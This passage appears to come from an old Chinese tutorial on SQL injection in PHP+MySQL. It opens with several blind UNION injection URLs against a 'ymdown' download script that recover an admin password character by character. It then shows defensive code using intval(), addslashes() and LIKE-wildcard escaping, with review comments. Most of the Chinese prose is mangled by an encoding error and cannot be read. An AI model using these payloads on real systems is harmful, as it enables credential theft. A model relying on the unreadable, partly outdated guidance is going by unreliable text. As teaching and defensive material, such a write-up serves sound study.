http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50
#֤ڶλ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,4,1))=52
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,5,1))=53
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,6,1))=54
#֤λ
select char(49,50,51,52,53,54)ͿԵõ123456
OKԽ֤ǵĽûд˵һ£뱾123456Բord()ֱӲ£Ϊ˴ܿһḶ́һǡרҵһˡ油һͼDZд²HBʱȡģ
עķ
Դ֣һǷǴ뱾ܷõºܶˣǾǰmagic_quotes_gpcΪOndisplay_errorsΪOffҲͲڶ˵ȻĽӴdz⣬ǻǴӳѰԭ
˵phpaspãȫõĺͿֳεıֻʹһintval()ɽ⣬ִвѯ֮ǰȴһ±ӾǺܰȫˣ
// Numeric parameter: intval() coerces the value to an integer before it is
// interpolated, so quote-breaking and UNION payloads cannot survive the cast.
$id = intval($id);
mysql_query("SELECT * FROM article WHERE articleid='$id'");
д
mysql_query("SELECT * FROM article WHERE articleid=".intval($id)."")
ι죬ջǻתΪβ·ݿġܶͳдdzࡣ
ַεıҲaddslashes()úˣúmagic_quotes_gpcһʹúе ' (), " (˫), \ (б) and ַԶתΪзбߵַ°汾phpmagic_quotes_gpcˣʹaddslashes()ҲгͻԷʹá£
// String parameter: addslashes() escapes ' " \ and NUL, and only helps when
// the value sits inside quotes in the SQL -- it does nothing for a bare value.
// NOTE(review): addslashes() is not aware of the connection character set;
// prefer mysql_real_escape_string() (PHP >= 4.3) or prepared statements,
// and do not stack it on top of magic_quotes_gpc=On (double escaping).
$username = addslashes($username);
mysql_query("SELECT * FROM members WHERE userid='$username'");
д
mysql_query("SELECT * FROM members WHERE userid=".addslashes($username)."")
ʹaddslashes()ԱԴ֡ղŵǰֱӰѡ_%תΪ\_\%ͿˣȻҲҪʹaddslashes()£
// Search-box hardening (the lines left commented out in search.php above):
// 1) addslashes() first -- it doubles backslashes, so it must run before the
//    backslashes added in the next two lines;
// 2) escape the LIKE metacharacters _ and % so a keyword of "%" or "__"
//    cannot match every row. "\_" and "\%" are literal in a PHP double-quoted
//    string (not escape sequences), and MySQL LIKE treats a backslash-prefixed
//    wildcard as that literal character with the default escape character.
$keywords = addslashes($keywords);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
ASPһҪдһѵĴ룬һ룬ǾͿѱеˣDzǺܼ㣿
ƪ20043·ÿʱѧϰоģ5Ѯд꣬жǾԲԵģĽǼܽɣкܶ༼ѵûнģ˴©ģӭָ
вΣԼߵĶֻҪһ㶼ԽǵԺ㷺ԣҲûдҸ˹ƣýPHP+MYSQLעһϵйߣҲռ߷չҽһҪŪԭֻֻ꣬Чʰˣļ߳
ҿƪµʱѾ߿ˣһдһƪо
Ϊø˽ⲢPHP+MYSQLע뼼Ҳдƪ£һΡҪκιҵκκϷƻԸ
طdz
һж
ԽԽӽԱ
Ǵͬͬ